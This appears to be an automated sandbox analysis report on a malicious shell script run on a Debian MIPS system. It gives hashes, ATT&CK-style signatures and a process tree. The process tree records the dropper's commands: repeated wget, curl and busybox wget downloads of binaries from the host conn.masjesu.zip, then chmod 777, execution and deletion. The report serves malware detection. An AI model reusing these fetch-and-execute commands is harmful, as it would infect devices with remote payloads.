Analysis
-
max time kernel
75s -
max time network
77s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240418-en -
resource tags
arch:mipselimage:debian9-mipsel-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
18/10/2024, 01:44
Static task
static1
Behavioral task
behavioral1
Sample
53c975f02338874d76ba52f3408b54c0a277ff44a0734c5e99c62d929d6c7534.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
53c975f02338874d76ba52f3408b54c0a277ff44a0734c5e99c62d929d6c7534.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
53c975f02338874d76ba52f3408b54c0a277ff44a0734c5e99c62d929d6c7534.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
53c975f02338874d76ba52f3408b54c0a277ff44a0734c5e99c62d929d6c7534.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
53c975f02338874d76ba52f3408b54c0a277ff44a0734c5e99c62d929d6c7534.sh
-
Size
10KB
-
MD5
465a5e1c3b12b954a80ce46b66ed1dfc
-
SHA1
2d79f93f29bc375e1e047f7f87bd0e015e297011
-
SHA256
53c975f02338874d76ba52f3408b54c0a277ff44a0734c5e99c62d929d6c7534
-
SHA512
918aaea5078e2ee2f65ce4cf616f99eb0dd9338d62f18dc90cec672e3e55695f689f24995bcae642021415213bdfdbc597c2b63f078ce7562fd91ae4cc0faa09
-
SSDEEP
96:YPjVlIrIHIB2PW6zPRg3LyUpBUL5lPVLs3sLsFWOBLj/R3LHLttULfqfifhnW6aX:oFrL9GNAN+zXUDxcCzXIZ
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 904 chmod 947 chmod 800 chmod 890 chmod 918 chmod 940 chmod 961 chmod 1018 chmod 748 chmod 982 chmod 989 chmod 1004 chmod 968 chmod 772 chmod 873 chmod 883 chmod 933 chmod 756 chmod 926 chmod 822 chmod 897 chmod 997 chmod 846 chmod 911 chmod 954 chmod 975 chmod 1011 chmod 829 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/nWBsz22rKl7aCgUqX7xu0cR8U0Xmmnr45b 749 nWBsz22rKl7aCgUqX7xu0cR8U0Xmmnr45b /tmp/hDKuy9WxCvkZuHE009JstUfsFt5F8LJLzy 757 hDKuy9WxCvkZuHE009JstUfsFt5F8LJLzy /tmp/Ni29Prpvb1azwvJoYm8xiZbcnyv9pu7KFU 774 Ni29Prpvb1azwvJoYm8xiZbcnyv9pu7KFU /tmp/EYVr5FoOtl6chB3Srafztjtxj6Q2LlXLmy 802 EYVr5FoOtl6chB3Srafztjtxj6Q2LlXLmy /tmp/5HCw8agUABcswUSMjwMvbIuMhplOaYYO6I 823 5HCw8agUABcswUSMjwMvbIuMhplOaYYO6I /tmp/3Nezawc4R5ewdoXcHXbUlcXvnpdW1jpOpu 830 3Nezawc4R5ewdoXcHXbUlcXvnpdW1jpOpu /tmp/RadHlbIPIIN1pRIPhM07bOifrGxY2rZTnI 847 RadHlbIPIIN1pRIPhM07bOifrGxY2rZTnI /tmp/PjqqIx8g7mCKgqfRSahIId1NpARXsyXtOA 874 PjqqIx8g7mCKgqfRSahIId1NpARXsyXtOA /tmp/4VqWJn5dYWs9Z88QU6dt4wizyvrxdfSMCW 884 4VqWJn5dYWs9Z88QU6dt4wizyvrxdfSMCW /tmp/MGnktBtnHKriEwkEOkj9vcGpHQYef2an7s 891 MGnktBtnHKriEwkEOkj9vcGpHQYef2an7s /tmp/yl6zAlhmXj70XJUaDaiP6cs8C7E4ALB3DR 898 yl6zAlhmXj70XJUaDaiP6cs8C7E4ALB3DR /tmp/Rrrh8e2Kc9RYQe64HS8TxhPxP3SyANk8hG 905 Rrrh8e2Kc9RYQe64HS8TxhPxP3SyANk8hG /tmp/WIk3LA9SpXqSSIGP71jeZsx0ucFlzCNJer 912 WIk3LA9SpXqSSIGP71jeZsx0ucFlzCNJer /tmp/ecsSN86G0JtiaUBcJAPDdl8vahpduOPESA 919 ecsSN86G0JtiaUBcJAPDdl8vahpduOPESA /tmp/hDKuy9WxCvkZuHE009JstUfsFt5F8LJLzy 927 hDKuy9WxCvkZuHE009JstUfsFt5F8LJLzy /tmp/Ni29Prpvb1azwvJoYm8xiZbcnyv9pu7KFU 934 Ni29Prpvb1azwvJoYm8xiZbcnyv9pu7KFU /tmp/EYVr5FoOtl6chB3Srafztjtxj6Q2LlXLmy 941 EYVr5FoOtl6chB3Srafztjtxj6Q2LlXLmy /tmp/5HCw8agUABcswUSMjwMvbIuMhplOaYYO6I 948 5HCw8agUABcswUSMjwMvbIuMhplOaYYO6I /tmp/3Nezawc4R5ewdoXcHXbUlcXvnpdW1jpOpu 955 3Nezawc4R5ewdoXcHXbUlcXvnpdW1jpOpu /tmp/RadHlbIPIIN1pRIPhM07bOifrGxY2rZTnI 962 RadHlbIPIIN1pRIPhM07bOifrGxY2rZTnI /tmp/yl6zAlhmXj70XJUaDaiP6cs8C7E4ALB3DR 969 yl6zAlhmXj70XJUaDaiP6cs8C7E4ALB3DR /tmp/Rrrh8e2Kc9RYQe64HS8TxhPxP3SyANk8hG 976 Rrrh8e2Kc9RYQe64HS8TxhPxP3SyANk8hG /tmp/WIk3LA9SpXqSSIGP71jeZsx0ucFlzCNJer 983 WIk3LA9SpXqSSIGP71jeZsx0ucFlzCNJer /tmp/ecsSN86G0JtiaUBcJAPDdl8vahpduOPESA 990 ecsSN86G0JtiaUBcJAPDdl8vahpduOPESA /tmp/PjqqIx8g7mCKgqfRSahIId1NpARXsyXtOA 998 PjqqIx8g7mCKgqfRSahIId1NpARXsyXtOA /tmp/4VqWJn5dYWs9Z88QU6dt4wizyvrxdfSMCW 1005 4VqWJn5dYWs9Z88QU6dt4wizyvrxdfSMCW /tmp/MGnktBtnHKriEwkEOkj9vcGpHQYef2an7s 1012 MGnktBtnHKriEwkEOkj9vcGpHQYef2an7s /tmp/nWBsz22rKl7aCgUqX7xu0cR8U0Xmmnr45b 1019 nWBsz22rKl7aCgUqX7xu0cR8U0Xmmnr45b -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 917 busybox 725 wget 760 curl 835 curl 877 curl 882 busybox 889 busybox 901 curl 932 busybox 1007 wget 996 busybox 753 curl 759 wget 807 wget 821 busybox 910 busybox 914 wget 994 curl 1000 wget 936 wget 944 curl 1003 busybox 778 wget 899 rm 969 yl6zAlhmXj70XJUaDaiP6cs8C7E4ALB3DR 1001 curl 736 curl 752 wget 832 wget 876 wget 900 wget 929 wget 951 curl 988 busybox 1017 busybox 745 busybox 755 busybox 847 RadHlbIPIIN1pRIPhM07bOifrGxY2rZTnI 908 curl 939 busybox 981 busybox 993 wget 849 rm 858 curl 971 wget 1008 curl 1010 busybox 825 wget 826 curl 903 busybox 946 busybox 960 busybox 962 RadHlbIPIIN1pRIPhM07bOifrGxY2rZTnI 979 curl 787 curl 894 curl 1014 wget 815 curl 893 wget 923 curl 953 busybox 963 rm 978 wget 986 curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/hDKuy9WxCvkZuHE009JstUfsFt5F8LJLzy curl File opened for modification /tmp/3Nezawc4R5ewdoXcHXbUlcXvnpdW1jpOpu curl File opened for modification /tmp/ecsSN86G0JtiaUBcJAPDdl8vahpduOPESA curl File opened for modification /tmp/4VqWJn5dYWs9Z88QU6dt4wizyvrxdfSMCW curl File opened for modification /tmp/Rrrh8e2Kc9RYQe64HS8TxhPxP3SyANk8hG curl File opened for modification /tmp/ecsSN86G0JtiaUBcJAPDdl8vahpduOPESA curl File opened for modification /tmp/PjqqIx8g7mCKgqfRSahIId1NpARXsyXtOA curl File opened for modification /tmp/PjqqIx8g7mCKgqfRSahIId1NpARXsyXtOA curl File opened for modification /tmp/yl6zAlhmXj70XJUaDaiP6cs8C7E4ALB3DR curl File opened for modification /tmp/WIk3LA9SpXqSSIGP71jeZsx0ucFlzCNJer curl File opened for modification /tmp/MGnktBtnHKriEwkEOkj9vcGpHQYef2an7s curl File opened for modification /tmp/nWBsz22rKl7aCgUqX7xu0cR8U0Xmmnr45b curl File opened for modification /tmp/4VqWJn5dYWs9Z88QU6dt4wizyvrxdfSMCW curl File opened for modification /tmp/5HCw8agUABcswUSMjwMvbIuMhplOaYYO6I curl File opened for modification /tmp/3Nezawc4R5ewdoXcHXbUlcXvnpdW1jpOpu curl File opened for modification /tmp/hDKuy9WxCvkZuHE009JstUfsFt5F8LJLzy curl File opened for modification /tmp/EYVr5FoOtl6chB3Srafztjtxj6Q2LlXLmy curl File opened for modification /tmp/RadHlbIPIIN1pRIPhM07bOifrGxY2rZTnI curl File opened for modification /tmp/yl6zAlhmXj70XJUaDaiP6cs8C7E4ALB3DR curl File opened for modification /tmp/Ni29Prpvb1azwvJoYm8xiZbcnyv9pu7KFU curl File opened for modification /tmp/Rrrh8e2Kc9RYQe64HS8TxhPxP3SyANk8hG curl File opened for modification /tmp/nWBsz22rKl7aCgUqX7xu0cR8U0Xmmnr45b curl File opened for modification /tmp/5HCw8agUABcswUSMjwMvbIuMhplOaYYO6I curl File opened for modification /tmp/MGnktBtnHKriEwkEOkj9vcGpHQYef2an7s curl File opened for modification /tmp/WIk3LA9SpXqSSIGP71jeZsx0ucFlzCNJer curl File opened for modification /tmp/EYVr5FoOtl6chB3Srafztjtxj6Q2LlXLmy curl File opened for modification /tmp/Ni29Prpvb1azwvJoYm8xiZbcnyv9pu7KFU curl File opened for modification /tmp/RadHlbIPIIN1pRIPhM07bOifrGxY2rZTnI curl
Processes
-
/tmp/53c975f02338874d76ba52f3408b54c0a277ff44a0734c5e99c62d929d6c7534.sh/tmp/53c975f02338874d76ba52f3408b54c0a277ff44a0734c5e99c62d929d6c7534.sh1⤵PID:719
-
/bin/rm/bin/rm bins.sh2⤵PID:722
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/nWBsz22rKl7aCgUqX7xu0cR8U0Xmmnr45b2⤵
- System Network Configuration Discovery
PID:725
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/nWBsz22rKl7aCgUqX7xu0cR8U0Xmmnr45b2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:736
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/nWBsz22rKl7aCgUqX7xu0cR8U0Xmmnr45b2⤵
- System Network Configuration Discovery
PID:745
-
-
/bin/chmodchmod 777 nWBsz22rKl7aCgUqX7xu0cR8U0Xmmnr45b2⤵
- File and Directory Permissions Modification
PID:748
-
-
/tmp/nWBsz22rKl7aCgUqX7xu0cR8U0Xmmnr45b./nWBsz22rKl7aCgUqX7xu0cR8U0Xmmnr45b2⤵
- Executes dropped EXE
PID:749
-
-
/bin/rmrm nWBsz22rKl7aCgUqX7xu0cR8U0Xmmnr45b2⤵PID:751
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/hDKuy9WxCvkZuHE009JstUfsFt5F8LJLzy2⤵
- System Network Configuration Discovery
PID:752
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/hDKuy9WxCvkZuHE009JstUfsFt5F8LJLzy2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:753
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/hDKuy9WxCvkZuHE009JstUfsFt5F8LJLzy2⤵
- System Network Configuration Discovery
PID:755
-
-
/bin/chmodchmod 777 hDKuy9WxCvkZuHE009JstUfsFt5F8LJLzy2⤵
- File and Directory Permissions Modification
PID:756
-
-
/tmp/hDKuy9WxCvkZuHE009JstUfsFt5F8LJLzy./hDKuy9WxCvkZuHE009JstUfsFt5F8LJLzy2⤵
- Executes dropped EXE
PID:757
-
-
/bin/rmrm hDKuy9WxCvkZuHE009JstUfsFt5F8LJLzy2⤵PID:758
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Ni29Prpvb1azwvJoYm8xiZbcnyv9pu7KFU2⤵
- System Network Configuration Discovery
PID:759
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Ni29Prpvb1azwvJoYm8xiZbcnyv9pu7KFU2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:760
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Ni29Prpvb1azwvJoYm8xiZbcnyv9pu7KFU2⤵PID:768
-
-
/bin/chmodchmod 777 Ni29Prpvb1azwvJoYm8xiZbcnyv9pu7KFU2⤵
- File and Directory Permissions Modification
PID:772
-
-
/tmp/Ni29Prpvb1azwvJoYm8xiZbcnyv9pu7KFU./Ni29Prpvb1azwvJoYm8xiZbcnyv9pu7KFU2⤵
- Executes dropped EXE
PID:774
-
-
/bin/rmrm Ni29Prpvb1azwvJoYm8xiZbcnyv9pu7KFU2⤵PID:777
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/EYVr5FoOtl6chB3Srafztjtxj6Q2LlXLmy2⤵
- System Network Configuration Discovery
PID:778
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/EYVr5FoOtl6chB3Srafztjtxj6Q2LlXLmy2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:787
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/EYVr5FoOtl6chB3Srafztjtxj6Q2LlXLmy2⤵PID:794
-
-
/bin/chmodchmod 777 EYVr5FoOtl6chB3Srafztjtxj6Q2LlXLmy2⤵
- File and Directory Permissions Modification
PID:800
-
-
/tmp/EYVr5FoOtl6chB3Srafztjtxj6Q2LlXLmy./EYVr5FoOtl6chB3Srafztjtxj6Q2LlXLmy2⤵
- Executes dropped EXE
PID:802
-
-
/bin/rmrm EYVr5FoOtl6chB3Srafztjtxj6Q2LlXLmy2⤵PID:805
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/5HCw8agUABcswUSMjwMvbIuMhplOaYYO6I2⤵
- System Network Configuration Discovery
PID:807
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/5HCw8agUABcswUSMjwMvbIuMhplOaYYO6I2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:815
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/5HCw8agUABcswUSMjwMvbIuMhplOaYYO6I2⤵
- System Network Configuration Discovery
PID:821
-
-
/bin/chmodchmod 777 5HCw8agUABcswUSMjwMvbIuMhplOaYYO6I2⤵
- File and Directory Permissions Modification
PID:822
-
-
/tmp/5HCw8agUABcswUSMjwMvbIuMhplOaYYO6I./5HCw8agUABcswUSMjwMvbIuMhplOaYYO6I2⤵
- Executes dropped EXE
PID:823
-
-
/bin/rmrm 5HCw8agUABcswUSMjwMvbIuMhplOaYYO6I2⤵PID:824
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/3Nezawc4R5ewdoXcHXbUlcXvnpdW1jpOpu2⤵
- System Network Configuration Discovery
PID:825
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/3Nezawc4R5ewdoXcHXbUlcXvnpdW1jpOpu2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:826
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/3Nezawc4R5ewdoXcHXbUlcXvnpdW1jpOpu2⤵PID:828
-
-
/bin/chmodchmod 777 3Nezawc4R5ewdoXcHXbUlcXvnpdW1jpOpu2⤵
- File and Directory Permissions Modification
PID:829
-
-
/tmp/3Nezawc4R5ewdoXcHXbUlcXvnpdW1jpOpu./3Nezawc4R5ewdoXcHXbUlcXvnpdW1jpOpu2⤵
- Executes dropped EXE
PID:830
-
-
/bin/rmrm 3Nezawc4R5ewdoXcHXbUlcXvnpdW1jpOpu2⤵PID:831
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/RadHlbIPIIN1pRIPhM07bOifrGxY2rZTnI2⤵
- System Network Configuration Discovery
PID:832
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/RadHlbIPIIN1pRIPhM07bOifrGxY2rZTnI2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:835
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/RadHlbIPIIN1pRIPhM07bOifrGxY2rZTnI2⤵PID:840
-
-
/bin/chmodchmod 777 RadHlbIPIIN1pRIPhM07bOifrGxY2rZTnI2⤵
- File and Directory Permissions Modification
PID:846
-
-
/tmp/RadHlbIPIIN1pRIPhM07bOifrGxY2rZTnI./RadHlbIPIIN1pRIPhM07bOifrGxY2rZTnI2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:847
-
-
/bin/rmrm RadHlbIPIIN1pRIPhM07bOifrGxY2rZTnI2⤵
- System Network Configuration Discovery
PID:849
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/PjqqIx8g7mCKgqfRSahIId1NpARXsyXtOA2⤵PID:850
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/PjqqIx8g7mCKgqfRSahIId1NpARXsyXtOA2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:858
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/PjqqIx8g7mCKgqfRSahIId1NpARXsyXtOA2⤵PID:868
-
-
/bin/chmodchmod 777 PjqqIx8g7mCKgqfRSahIId1NpARXsyXtOA2⤵
- File and Directory Permissions Modification
PID:873
-
-
/tmp/PjqqIx8g7mCKgqfRSahIId1NpARXsyXtOA./PjqqIx8g7mCKgqfRSahIId1NpARXsyXtOA2⤵
- Executes dropped EXE
PID:874
-
-
/bin/rmrm PjqqIx8g7mCKgqfRSahIId1NpARXsyXtOA2⤵PID:875
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/4VqWJn5dYWs9Z88QU6dt4wizyvrxdfSMCW2⤵
- System Network Configuration Discovery
PID:876
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/4VqWJn5dYWs9Z88QU6dt4wizyvrxdfSMCW2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:877
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/4VqWJn5dYWs9Z88QU6dt4wizyvrxdfSMCW2⤵
- System Network Configuration Discovery
PID:882
-
-
/bin/chmodchmod 777 4VqWJn5dYWs9Z88QU6dt4wizyvrxdfSMCW2⤵
- File and Directory Permissions Modification
PID:883
-
-
/tmp/4VqWJn5dYWs9Z88QU6dt4wizyvrxdfSMCW./4VqWJn5dYWs9Z88QU6dt4wizyvrxdfSMCW2⤵
- Executes dropped EXE
PID:884
-
-
/bin/rmrm 4VqWJn5dYWs9Z88QU6dt4wizyvrxdfSMCW2⤵PID:885
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/MGnktBtnHKriEwkEOkj9vcGpHQYef2an7s2⤵PID:886
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/MGnktBtnHKriEwkEOkj9vcGpHQYef2an7s2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:887
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/MGnktBtnHKriEwkEOkj9vcGpHQYef2an7s2⤵
- System Network Configuration Discovery
PID:889
-
-
/bin/chmodchmod 777 MGnktBtnHKriEwkEOkj9vcGpHQYef2an7s2⤵
- File and Directory Permissions Modification
PID:890
-
-
/tmp/MGnktBtnHKriEwkEOkj9vcGpHQYef2an7s./MGnktBtnHKriEwkEOkj9vcGpHQYef2an7s2⤵
- Executes dropped EXE
PID:891
-
-
/bin/rmrm MGnktBtnHKriEwkEOkj9vcGpHQYef2an7s2⤵PID:892
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/yl6zAlhmXj70XJUaDaiP6cs8C7E4ALB3DR2⤵
- System Network Configuration Discovery
PID:893
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/yl6zAlhmXj70XJUaDaiP6cs8C7E4ALB3DR2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:894
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/yl6zAlhmXj70XJUaDaiP6cs8C7E4ALB3DR2⤵PID:896
-
-
/bin/chmodchmod 777 yl6zAlhmXj70XJUaDaiP6cs8C7E4ALB3DR2⤵
- File and Directory Permissions Modification
PID:897
-
-
/tmp/yl6zAlhmXj70XJUaDaiP6cs8C7E4ALB3DR./yl6zAlhmXj70XJUaDaiP6cs8C7E4ALB3DR2⤵
- Executes dropped EXE
PID:898
-
-
/bin/rmrm yl6zAlhmXj70XJUaDaiP6cs8C7E4ALB3DR2⤵
- System Network Configuration Discovery
PID:899
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Rrrh8e2Kc9RYQe64HS8TxhPxP3SyANk8hG2⤵
- System Network Configuration Discovery
PID:900
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Rrrh8e2Kc9RYQe64HS8TxhPxP3SyANk8hG2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:901
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Rrrh8e2Kc9RYQe64HS8TxhPxP3SyANk8hG2⤵
- System Network Configuration Discovery
PID:903
-
-
/bin/chmodchmod 777 Rrrh8e2Kc9RYQe64HS8TxhPxP3SyANk8hG2⤵
- File and Directory Permissions Modification
PID:904
-
-
/tmp/Rrrh8e2Kc9RYQe64HS8TxhPxP3SyANk8hG./Rrrh8e2Kc9RYQe64HS8TxhPxP3SyANk8hG2⤵
- Executes dropped EXE
PID:905
-
-
/bin/rmrm Rrrh8e2Kc9RYQe64HS8TxhPxP3SyANk8hG2⤵PID:906
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/WIk3LA9SpXqSSIGP71jeZsx0ucFlzCNJer2⤵PID:907
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/WIk3LA9SpXqSSIGP71jeZsx0ucFlzCNJer2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:908
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/WIk3LA9SpXqSSIGP71jeZsx0ucFlzCNJer2⤵
- System Network Configuration Discovery
PID:910
-
-
/bin/chmodchmod 777 WIk3LA9SpXqSSIGP71jeZsx0ucFlzCNJer2⤵
- File and Directory Permissions Modification
PID:911
-
-
/tmp/WIk3LA9SpXqSSIGP71jeZsx0ucFlzCNJer./WIk3LA9SpXqSSIGP71jeZsx0ucFlzCNJer2⤵
- Executes dropped EXE
PID:912
-
-
/bin/rmrm WIk3LA9SpXqSSIGP71jeZsx0ucFlzCNJer2⤵PID:913
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ecsSN86G0JtiaUBcJAPDdl8vahpduOPESA2⤵
- System Network Configuration Discovery
PID:914
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ecsSN86G0JtiaUBcJAPDdl8vahpduOPESA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:915
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ecsSN86G0JtiaUBcJAPDdl8vahpduOPESA2⤵
- System Network Configuration Discovery
PID:917
-
-
/bin/chmodchmod 777 ecsSN86G0JtiaUBcJAPDdl8vahpduOPESA2⤵
- File and Directory Permissions Modification
PID:918
-
-
/tmp/ecsSN86G0JtiaUBcJAPDdl8vahpduOPESA./ecsSN86G0JtiaUBcJAPDdl8vahpduOPESA2⤵
- Executes dropped EXE
PID:919
-
-
/bin/rmrm ecsSN86G0JtiaUBcJAPDdl8vahpduOPESA2⤵PID:921
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/hDKuy9WxCvkZuHE009JstUfsFt5F8LJLzy2⤵PID:922
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/hDKuy9WxCvkZuHE009JstUfsFt5F8LJLzy2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:923
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/hDKuy9WxCvkZuHE009JstUfsFt5F8LJLzy2⤵PID:925
-
-
/bin/chmodchmod 777 hDKuy9WxCvkZuHE009JstUfsFt5F8LJLzy2⤵
- File and Directory Permissions Modification
PID:926
-
-
/tmp/hDKuy9WxCvkZuHE009JstUfsFt5F8LJLzy./hDKuy9WxCvkZuHE009JstUfsFt5F8LJLzy2⤵
- Executes dropped EXE
PID:927
-
-
/bin/rmrm hDKuy9WxCvkZuHE009JstUfsFt5F8LJLzy2⤵PID:928
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Ni29Prpvb1azwvJoYm8xiZbcnyv9pu7KFU2⤵
- System Network Configuration Discovery
PID:929
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Ni29Prpvb1azwvJoYm8xiZbcnyv9pu7KFU2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:930
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Ni29Prpvb1azwvJoYm8xiZbcnyv9pu7KFU2⤵
- System Network Configuration Discovery
PID:932
-
-
/bin/chmodchmod 777 Ni29Prpvb1azwvJoYm8xiZbcnyv9pu7KFU2⤵
- File and Directory Permissions Modification
PID:933
-
-
/tmp/Ni29Prpvb1azwvJoYm8xiZbcnyv9pu7KFU./Ni29Prpvb1azwvJoYm8xiZbcnyv9pu7KFU2⤵
- Executes dropped EXE
PID:934
-
-
/bin/rmrm Ni29Prpvb1azwvJoYm8xiZbcnyv9pu7KFU2⤵PID:935
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/EYVr5FoOtl6chB3Srafztjtxj6Q2LlXLmy2⤵
- System Network Configuration Discovery
PID:936
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/EYVr5FoOtl6chB3Srafztjtxj6Q2LlXLmy2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:937
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/EYVr5FoOtl6chB3Srafztjtxj6Q2LlXLmy2⤵
- System Network Configuration Discovery
PID:939
-
-
/bin/chmodchmod 777 EYVr5FoOtl6chB3Srafztjtxj6Q2LlXLmy2⤵
- File and Directory Permissions Modification
PID:940
-
-
/tmp/EYVr5FoOtl6chB3Srafztjtxj6Q2LlXLmy./EYVr5FoOtl6chB3Srafztjtxj6Q2LlXLmy2⤵
- Executes dropped EXE
PID:941
-
-
/bin/rmrm EYVr5FoOtl6chB3Srafztjtxj6Q2LlXLmy2⤵PID:942
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/5HCw8agUABcswUSMjwMvbIuMhplOaYYO6I2⤵PID:943
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/5HCw8agUABcswUSMjwMvbIuMhplOaYYO6I2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:944
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/5HCw8agUABcswUSMjwMvbIuMhplOaYYO6I2⤵
- System Network Configuration Discovery
PID:946
-
-
/bin/chmodchmod 777 5HCw8agUABcswUSMjwMvbIuMhplOaYYO6I2⤵
- File and Directory Permissions Modification
PID:947
-
-
/tmp/5HCw8agUABcswUSMjwMvbIuMhplOaYYO6I./5HCw8agUABcswUSMjwMvbIuMhplOaYYO6I2⤵
- Executes dropped EXE
PID:948
-
-
/bin/rmrm 5HCw8agUABcswUSMjwMvbIuMhplOaYYO6I2⤵PID:949
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/3Nezawc4R5ewdoXcHXbUlcXvnpdW1jpOpu2⤵PID:950
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/3Nezawc4R5ewdoXcHXbUlcXvnpdW1jpOpu2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:951
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/3Nezawc4R5ewdoXcHXbUlcXvnpdW1jpOpu2⤵
- System Network Configuration Discovery
PID:953
